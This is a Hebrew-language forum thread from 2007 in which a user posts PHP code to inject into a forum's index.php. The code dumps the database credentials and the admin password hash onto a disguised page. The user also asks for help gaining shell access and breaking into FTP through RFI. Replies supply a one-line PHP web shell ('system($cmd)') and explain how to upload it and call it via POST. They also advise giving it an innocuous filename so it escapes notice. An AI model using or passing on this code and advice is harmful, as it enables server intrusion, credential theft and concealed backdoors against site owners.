נושאים פעיליםנושאים פעילים  הצגת רשימה של חברי הפורוםרשימת משתמשים  חיפוש בפורוםחיפוש  עזרהעזרה
  הרשמההרשמה  התחברותהתחברות RSS עדכונים
אבטחת מידע
RSS UnderWarrior Forums : RSS אבטחת מידע
נושא

נושא: עזרה |PHP_Injections

שליחת תגובהשליחת נושא חדש
כותב
הודעה << נושא קודם | נושא הבא >>
MAnq
משתמש מתחיל
משתמש מתחיל
סמל אישי

הצטרף / הצטרפה: 22 July 2007
משתמש: מנותק/ת
הודעות: 4
נשלח בתאריך: 22 July 2007 בשעה 20:01 | IP רשוּם
ציטוט MAnq

למשל התקנתי לעמצי על השרת פורום http://ib-p.gold-hosting.info/forum

עכשיו אני רוצה להריץ עליו איזה קוד
חפורום יש מסד אני רוצה דרך איך אפשר יהיה לערוך את הקובץ INDEX.PHP כדי להכניס  לשם את ההשטלה הזות שהכנתי ולקבל את הפרטים של המסד..
אז השאה שלי בעצם איך אני משטיל אותה לקובץ INDEX.PHP
---------------------------------------------------------------------
include("./conf_global.php");
$result = mysql_query("SELECT * FROM ibf_members WHERE `id` = 1");
while(@($r=mysql_fetch_array($result))) {
$id=$r['id'];
$password=$r['password'];
}
$query = strtolower($_SERVER[REQUEST_URI]);
$licenseuser1 = array("benzona","benzonabenzona");
$licenseadmin1 = array("benzonabenzonabenzona","benzonabenzonabenzonabenzonabenzona");
$forumfakesecurityydswcurity = "
<html>
<head>

 <table width='250' height='52%' dir='rtl'>
 <tr>
   <td width='187' height='65'><center><span class='style1' align='center'><u></u></center></span>
      </td>
 </tr>
     <tr>
       <td><p class='style2'><br />Sql Name: $sql_database</br>user Name for sql :  $sql_user</br>Pass word : $sql_pass</br>Pass Has ( 1 ) : $password</span><p class='style2'><span class='style8'>
        <br />&nbsp;<div align='center'><a href='phpmyadmin'>Enter To PHPMYADMIN</a><br /><a href='http://gdataonline.com/seekhash.php'>iwanna to see waht is the hash</a></div></br>$ftp_user_name&nbsp;</span></td>
     </tr>
          <tr>
       <td><p class='style2'><center><span class='style1' align='center'><br>
          </span></p>          </td>
     </tr>
 </table>
<br><br>
</center>
</body>
</html>
---------------------------------------------------------------------

ואופשר לקבל קצת אתרים שיעזרו ללמוד לכתוב קודים למשל שאני יוכל לקבל גישת SHELL או לערוך קבצים
ואני רוצהגם כמה מדריכים עם אפשר לקבל לפריצת FTP דרך RFI או כל דבר אחר
תודה רבה..

חזרה לתחילת העמוד הצג את כרטיס החבר של MAnq חפש הודעות אחרות של MAnq
 
:)
אורח
אורח


הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
נשלח בתאריך: 23 July 2007 בשעה 00:16 | IP רשוּם
ציטוט :)

http://www.underwar.co.il/document-details.asp?id=298

זה על PHP Injections נראה לי שזה יעזור
חזרה לתחילת העמוד הצג את כרטיס החבר של :) חפש הודעות אחרות של :) בקר בדף הבית של :)
 
אורחת
אורח
אורח


הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
נשלח בתאריך: 03 August 2007 בשעה 13:49 | IP רשוּם
ציטוט אורחת

RFI ?  לא ראיתי בעיברית
אם אין לך בעייה עם אנגלית בסיסית לך לגוגל ותרשום  RFI+vulnerability
חזרה לתחילת העמוד הצג את כרטיס החבר של אורחת חפש הודעות אחרות של אורחת בקר בדף הבית של אורחת
 
אורחת
אורח
אורח


הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
נשלח בתאריך: 03 August 2007 בשעה 13:56 | IP רשוּם
ציטוט אורחת

 
קוד:
<? system($cmd) ?>
 
 
     shell 
עכשיו תעלה אותו לשרת  
חזרה לתחילת העמוד הצג את כרטיס החבר של אורחת חפש הודעות אחרות של אורחת בקר בדף הבית של אורחת
 
MAnq
משתמש מתחיל
משתמש מתחיל
סמל אישי

הצטרף / הצטרפה: 22 July 2007
משתמש: מנותק/ת
הודעות: 4
נשלח בתאריך: 05 August 2007 בשעה 09:25 | IP רשוּם
ציטוט MAnq

דרך איזה פורט להתחבר ..? FTP HTTP? או לחפש אחד  פתוח ולא מוכר ?

ואחראי שהתחברתי פשוט לכתוב את זה

<? system($cmd) ?>
 
ואז לעלות לשרת את הקובץ?
חזרה לתחילת העמוד הצג את כרטיס החבר של MAnq חפש הודעות אחרות של MAnq
 
אורחת
אורח
אורח


הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
נשלח בתאריך: 06 August 2007 בשעה 09:31 | IP רשוּם
ציטוט אורחת

בכל דרך שתוכל להתחבר וליצור מסמך php חדש, אתה יכול לכתוב אותו כבר על השרת עצמו אם אתה יודע א. על bug שמאפשר לך לשלוח פקודות ב. איך ליצור קובץ ע"י פקודה פשוטה.
או כפי ששאלת, ליצור את הקובץ ולהעלות אותו לשרת
 
אבל לא שאלת איך "להפעיל" את הshell
 
הפנייה אל השל צריכה להיות בעזרת post method
cmd=unix command
 
כמובן שאתה לא רוצה לקרוא לשל שלך shell
אתה רוצה לתת לו שם מאוד לא מחשיד
 
זה של מאוד פרימיטיבי אבל הוא יעשה בשבילך הכל עם ההרשאות של ה group שהיו לך כשהעלת אותו
 
בהצלחה
חזרה לתחילת העמוד הצג את כרטיס החבר של אורחת חפש הודעות אחרות של אורחת בקר בדף הבית של אורחת
 

אם ברצונך להגיב לנושא זה עליך קודם להתחבר
אם אינך רשום/ה כבר עליך להרשם

  שליחת תגובהשליחת נושא חדש
גרסת הדפסה גרסת הדפסה

קפיצה לפורום
אינך יכול/ה לשלוח נושאים חדשים בפורום זה
אינך יכול/ה להגיב לנושאים בפורום זה
אינך יכול/ה למחוק את הודעותיך ותגוביך בפורום זה
אינך יכול/ה לערוך את הודעותיך ותגובותיך בפורום זה
אינך יכול/ה לצור סקרים בפורום זה
אינך יכול/ה להצביע בסקרים בפורום זה